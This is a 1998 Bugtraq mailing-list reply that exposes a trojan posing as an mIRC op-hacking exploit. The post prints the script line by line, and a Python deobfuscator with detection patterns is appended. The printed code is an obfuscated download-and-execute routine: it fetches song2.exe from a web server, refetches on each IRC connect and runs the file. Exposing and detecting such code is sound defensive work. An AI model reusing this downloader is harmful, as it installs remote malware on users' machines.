Bugtraq mailing list archives

Re: your mail


From: cacaio () DEATHKNIGHTS COM (Cacaio Torquato)
Date: Sat, 14 Nov 1998 19:37:29 -0200


At 14:50 13/11/98 -0500, root () BRAMPTON1 NETMATRIX NET wrote:
Hi,
while debugging/hexing/disassembling mirc my friend slotmech last week found
a mirc bug which allows to force users to send MODE commands to the server.
this example script sends a MODE +o to the irc server. the mirc author has
been notified of this but we didn't receive a response... my exploit+protection
scri$is included. Expect more mirc stuff from us.



Are you nutz man? Your code simply makes whoever wants to get ops get a file
from your server and execute it. I'm glad you weren't smart enough to place
the full address of your server.
For the ones who want to know exactly what's happening, I will explain
the code step by step.

Your attempt to install your file on everyone who wants to hack ops was
funny, just funny...

alias hackop {
...
 checklen $1
...
}

call the function checklen - see below


alias checklen {
 .if (%xcomplete == 1) halt
 .if (%xinprog == 1) halt
 .set %xfilename song2.exe
 .set %xlof $lof(%xfilename)
 .set %xfirst 1
 .write -c %xfilename

sets the filename to song2.exe, and clears it if something is in it already.

 ; echo 3 $active $chr(100 111 110 116 - 115 112 111 105 108 - 116 104
101 - 1$  .sockclose protx

if this line is uncommented, it displays in the screen the following message:
d o n t - s p o i l - t h e

 .sockopen protx $chr(119) $+ $chr(119) $+ $chr(119) $+ . $+ $chr(103) $+
$chr$}

opens a socket connection with the designated server. the one placed in his
code is www.g (i think he forgot the rest)

on 1:sockopen:protx: {
 .sockwrite -n protx $chr(71) $+ $chr(69) $+ $chr(84) $chr(47) $+
$chr(66) $+ $+ $chr(101) $+ $chr(108) $+ $chr(116) $+ $chr(97) $+ $chr(47)
$+ $chr(57) $+ $c$  .sockwrite -n protx
}

when this socket connection is opened, he sends the request 'GET /Belta/9' to
the server and starts receiving data

on 1:sockread:protx: {
 .sockread &test
 .set %xlof $lof(%xfilename)
 .if (%xfirst == 1) set %xlof 0
 .set %xfirst 0
 .bwrite %xfilename %xlof $sockbr &test
}

just receives the data and makes it a file

on 1:connect:checklen

why is it here? because when the user connects to the irc server, the
script will grab the file again, and again and again.

on 1:sockclose:protx: {
 .sockread &test
 if ($sockbr > 0) {
   .set %xlof $lof(%xfilename)
   .bwrite %xfilename %xlof $sockbr &test
 }

finishes writing the file

 .if ($lof(%xfilename) == 178306) {
   .run %xfilename
   .set %xcomplete 1
 }

if the size of the file, in bytes, is equal to 178306, it runs the file

 if ($lof(%xfilename) != 178306) {
   .timer 1 300 checklen
 }

if the size of the file, in bytes, is less than 178306, it starts a timer that
in 300 seconds will get the file again

 }
 unset %xinprog
 unset %xfilename
 unset %xlof
 unset %xfirst
}


unsets the garbage variables

-----------
that's it

Best regards,
--
Cacaio Torquato     http://www.deathknights.com/cacaio

The Death Knights   http://www.deathknights.com          zelur xuniL  ()  -O)
Tedio INC.          http://www.tedio.org                 Think Blue.  /\  /\\
                                                                         _\_V
+-------------------------------------------------------+
|         BrasNet IRC Servers Network - Brazil          |
|         irc.brasnet.org   irc.webtech.com.br          |
|                   irc.sol.com.br                      |
+-------------------------------------------------------+
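As an added illustration, not part of the original post or of the script it dissects: a small Python deobfuscator that expands the $chr() / $+ spelling used above and flags the stages of the download-and-execute chain (socket open, HTTP GET, re-fetch on connect, .run of the written file). It runs over a constructed script in the same style; the hostname (example.com) and path are placeholders, not the values from the post.

```python
import re

# Constructed sample in the style of the script dissected above (hostname and
# path are placeholders, not the values from the original post).
SAMPLE_SCRIPT = """\
alias checklen {
 .set %xfilename song2.exe
 .sockopen protx $chr(119) $+ $chr(119) $+ $chr(119) $+ . $+ $chr(101) $+ $chr(120) $+ $chr(97) $+ $chr(109) $+ $chr(112) $+ $chr(108) $+ $chr(101) $+ . $+ $chr(99) $+ $chr(111) $+ $chr(109)
 ; echo 3 $active $chr(100 111 110 116 - 115 112 111 105 108 - 116 104 101)
}
on 1:sockopen:protx: {
 .sockwrite -n protx $chr(71) $+ $chr(69) $+ $chr(84) $chr(47) $+ $chr(66) $+ $chr(101) $+ $chr(108)
}
on 1:connect:checklen
on 1:sockclose:protx: {
 .if ($lof(%xfilename) == 178306) { .run %xfilename }
}
"""

CHR_RE = re.compile(r"\$chr\(([^)]*)\)")

def decode_chr(text):
    """Expand every $chr(...) into the characters it names and drop the $+
    concatenation operator, so 'w $+ w $+ w $+ . ...' reads as 'www.example.com'.
    Numeric tokens become characters; anything else (e.g. a literal '-') is kept."""
    def expand(m):
        return "".join(chr(int(t)) if t.isdigit() else t for t in m.group(1).split())
    return re.sub(r"\s*\$\+\s*", "", CHR_RE.sub(expand, text))

# Each tag names one stage of the download-and-execute chain described in the post.
SUSPICIOUS = {
    "sockopen": r"\bsockopen\b",               # outbound connection to a web server
    "http_get": r"\bsockwrite\b.*\bGET\b",     # HTTP request sent over that socket
    "on_connect_hook": r"^on\s+\d+:connect:",  # re-fetch on every IRC connect
    "run_downloaded": r"\brun\s+%\w+",         # execute the file that was written
}

def scan_script(script):
    """Decode each line and return (line_no, tag, decoded_line) for every match."""
    findings = []
    for no, raw in enumerate(script.splitlines(), 1):
        line = decode_chr(raw).strip()
        for tag, pattern in SUSPICIOUS.items():
            if re.search(pattern, line, re.IGNORECASE):
                findings.append((no, tag, line))
    return findings

if __name__ == "__main__":
    for no, tag, line in scan_script(SAMPLE_SCRIPT):
        print(f"line {no:>2} [{tag}] {line}")
```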
